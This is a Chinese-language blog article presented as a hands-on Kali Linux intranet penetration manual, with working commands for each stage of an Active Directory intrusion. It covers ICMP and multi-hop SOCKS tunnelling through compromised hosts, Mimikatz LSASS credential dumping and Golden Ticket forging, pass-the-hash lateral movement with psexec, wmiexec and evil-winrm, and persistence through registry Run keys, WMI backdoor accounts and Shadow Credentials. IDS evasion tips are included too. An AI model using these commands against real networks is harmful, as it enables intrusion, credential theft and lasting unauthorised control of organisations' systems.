news 2026/4/16 14:06:36

Kali Linux 内网渗透:深度工程实施手册

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
Kali Linux 内网渗透:深度工程实施手册

第一阶段:隧道与代理(内网渗透的 “高速公路”)

在内网中,你经常遇到的情况是:你只能控制一台 Web 服务器,但它身后有 10.10.10.x/24 的核心网段。你的 Kali 无法直接访问内网 IP,必须通过 Web 服务器(跳板)进行转发。

1. 隐蔽隧道:ICMP (Ping Tunnel)

场景:防火墙封禁了 TCP/UDP 出站,但允许 Ping (ICMP)。工具:icmptunnel(Kali 默认未安装,需自行下载编译或使用现成脚本)。

  • Kali (服务端):

    bash

    运行

    # 开启 IP 转发 echo 1 > /proc/sys/net/ipv4/ip_forward # 允许非 root 用户 Ping sysctl -w net.ipv4.ping_group_range="0 2147483647" # 启动服务端 ./icmptunnel -s # 设置虚拟网卡 IP ifconfig tun0 10.10.10.1 netmask 255.255.255.0
  • 跳板机 (Windows):上传icmptunnel.exe

    cmd

    icmptunnel.exe -c <Kali公网IP> # 在跳板机上设置路由,将内网流量指向隧道 route add 10.10.10.0 mask 255.255.255.0 10.10.10.2

2. 多重跳板:EarthWorm (EW) 与 Socks 代理

场景:目标内网有多层(A -> B -> C),你需要穿透多层才能到达核心。工具:ew_for_linux64/ew_for_Win.exe

  • Kali (监听端):

    bash

    运行

    ./ew -s rcsocks -l 1080 -e 8888
  • 第一层跳板 (A 机):

    cmd

    ew -s rssocks -d <KaliIP> -e 8888
  • 第二层跳板 (B 机):

    cmd

    ew -s lcx_slave -d <A机IP> -e 8888 -f <B机IP> -g 9999
  • 核心机 (C 机):

    cmd

    ew -s lcx_listen -l 9999 -e 1080
  • 最终连接:配置/etc/proxychains4.conf指向127.0.0.1:1080,即可直接访问 C 机内网。

第二阶段:域内信息收集(绘制 “藏宝图”)

拿到域内一台机器权限后,不要急着扫描,先进行被动侦察

1. 极速资产探测:CrackMapExec (CME)

这是内网渗透的 “瑞士军刀”,必须熟练掌握。

  • 探测存活主机与 SMB 签名状态:

    bash

    运行

    proxychains crackmapexec smb 192.168.1.0/24
  • 导出所有域用户列表 (需低权限账号):

    bash

    运行

    proxychains crackmapexec ldap <DC_IP> -u 'user' -p 'pass' --users
  • 寻找未打补丁的机器 (如 MS17-010):

    bash

    运行

    proxychains crackmapexec smb 192.168.1.0/24 -u '' -p '' --scripts smb-vuln-ms17-010

2. 黄金票据与白银票据:Mimikatz

在内网横向移动中,抓取 Hash 是基础,但票据传递更隐蔽。

  • 抓取 LSASS 内存 (获取 Hash):在 Meterpreter 中:

    meterpreter

    load kiwi creds_all # 或者直接迁移进程后 migrate -N lsass.exe hashdump
  • 制作黄金票据 (Golden Ticket):前提:已获取krbtgt账号的 Hash 和Domain SID

    cmd

    mimikatz "kerberos::golden /domain:test.local /sid:S-1-5-21-xxxx /rc4:<krbtgt_hash> /user:Administrator /ptt" exit
    (此时你已拥有域管理员权限,可直接访问任意机器)

第三阶段:横向移动(渗透的 “闪电战”)

1. 哈希传递 (PTH) - 不需要密码明文

  • 利用 Impacket 的 psexec.py:

    bash

    运行

    proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes <LM_hash>:<NTLM_hash> Administrator@192.168.1.105
  • 利用 CrackMapExec 执行命令:

    bash

    运行

    proxychains crackmapexec smb 192.168.1.105 -u Administrator -H <NTLM_hash> -x "whoami"

2. WMI 横向移动 (无文件落地)

场景:目标关闭了 445 端口 (SMB),但开启了 135 (WMI)。工具:wmiexec.py

bash

运行

proxychains python3 /usr/share/doc/python3-impacket/examples/wmiexec.py -hashes :<NTLM_hash> Administrator@192.168.1.106 "ipconfig"

3. WinRM (PowerShell 远程)

场景:目标开启了 WinRM (5985/5986),这是横向移动的 “快车道”。工具:evil-winrm

bash

运行

proxychains evil-winrm -i 192.168.1.107 -u Administrator -H <NTLM_hash>

第四阶段:权限维持(种 “不死鸟” 后门)

拿下域控后,如何确保下次还能进来?

1. 隐蔽账号 (Shadow Credentials)

原理:利用 AD CS (证书服务) 为域管账号添加一个备用的 Key Credential,无需修改密码。工具:Whisker.exe

  • 添加影子凭据:

    cmd

    Whisker.exe add /target:Administrator
  • 利用影子凭据登录 (Rubeus):

    cmd

    Rubeus.exe asktgt /user:Administrator /certificate:<Base64_Cert> /password:<Cert_Password> /getcredentials

2. 注册表后门 (Registry Persistence)

场景:目标是工作组机器,无杀毒软件。操作:

cmd

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v UpdateService /t REG_SZ /d "C:\backdoor.exe" /f

3. WMI 事件订阅后门

场景:非常隐蔽,几乎不落地文件。工具:WMIBackdoor.ps1

powershell

Import-Module .\WMIBackdoor.ps1 Set-WmiBackdoor -User "backdoor" -Password "P@ssw0rd"

第五阶段:Kali 内网排错与流量控制

在内网渗透中,**“网络不通”** 是最大的敌人。

1. 流量转发排查

如果发现代理不通,使用tcpdump在 Kali 上抓包:

bash

运行

tcpdump -i tun0 port 1080 -n

检查是否有数据包进来。如果有进无出,检查ip_forward

bash

运行

sysctl net.ipv4.ip_forward

2. 规避 IPS/IDS

  • 修改扫描速度:Nmap 扫描过快会被拉黑。

    bash

    运行

    proxychains nmap -sT -Pn -p- --scan-delay 1s 192.168.1.100
  • 使用静态二进制文件:在跳板机上,尽量使用静态编译的工具(如static-nmap,static-nc),避免依赖库缺失问题。

附录:必备工具包清单 (建议下载并打包)

在实战中,你需要将这些工具上传到跳板机:

  1. 信息收集:SharpHound.exe(BloodHound),PowerView.ps1
  2. 凭证提取:mimikatz.exe,Procdump.exe,LaZagne.exe
  3. 隧道工具:frp,nps,reGeorg,EarthWorm
  4. 横向移动:CrackMapExec(Linux/Win 版),PsExec.exe,PAExec.exe(PsExec 的无 DLL 版本)
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/16 13:32:59

【Python 技术深度解析】核心特性、生态架构与实战价值

文章目录 目录一、Python 核心定位与背景1. 核心定位与优势2. 版本现状3. 核心应用领域 二、Python 核心语言特性1. 语法简洁优雅&#xff0c;可读性极强2. 动态类型与强类型3. 丰富的内置数据结构4. 装饰器&#xff08;Decorator&#xff09;&#xff1a;函数增强的优雅方式5.…

作者头像 李华
网站建设 2026/4/13 19:06:50

[AI] 模型安全防护实战:Prompt Injection、Jailbreak 与输入净化全攻略

目标:为本地/私有化大模型构建安全防护方案,覆盖 Prompt Injection/Jailbreak 类型、检测与拦截策略、输入净化、提示工程约束及灰度验证方法。 1. 攻击面与威胁 Prompt Injection:恶意指令覆盖系统提示(如“忽略以上规则”)。 Jailbreak:通过花式提示绕过安全边界(角色…

作者头像 李华
网站建设 2026/3/11 3:33:21

高斯消元法简介

高斯消元法&#xff08;Gaussian Elimination&#xff09;是一种经典的数学方法&#xff0c;主要用来求解线性方程组。它就像是“逐步简化”一个复杂的方程系统&#xff0c;通过一些简单的行操作&#xff0c;把它变成一个容易计算的上三角形矩阵&#xff0c;然后从下往上求出每…

作者头像 李华
网站建设 2026/4/15 21:33:28

测试测试02

测试测试02

作者头像 李华
网站建设 2026/4/16 13:43:00

mfc40loc.dll文件丢失找不到损坏了 免费下载方法分享

在使用电脑系统时经常会出现丢失找不到某些文件的情况&#xff0c;由于很多常用软件都是采用 Microsoft Visual Studio 编写的&#xff0c;所以这类软件的运行需要依赖微软Visual C运行库&#xff0c;比如像 QQ、迅雷、Adobe 软件等等&#xff0c;如果没有安装VC运行库或者安装…

作者头像 李华
网站建设 2026/4/15 16:21:58

FreeRTOS嵌入式实时操作系统专业化系统学习目录

FreeRTOS嵌入式实时操作系统专业化系统学习目录 课程设计理念 本课程专为零基础嵌入式开发者设计,遵循“概念→机制→实践→系统”的螺旋式学习路径。课程深度融合最新研究成果(如SMP调度、低功耗设计)与典型工程案例(以移动机器人控制为核心),确保学员不仅能掌握API调…

作者头像 李华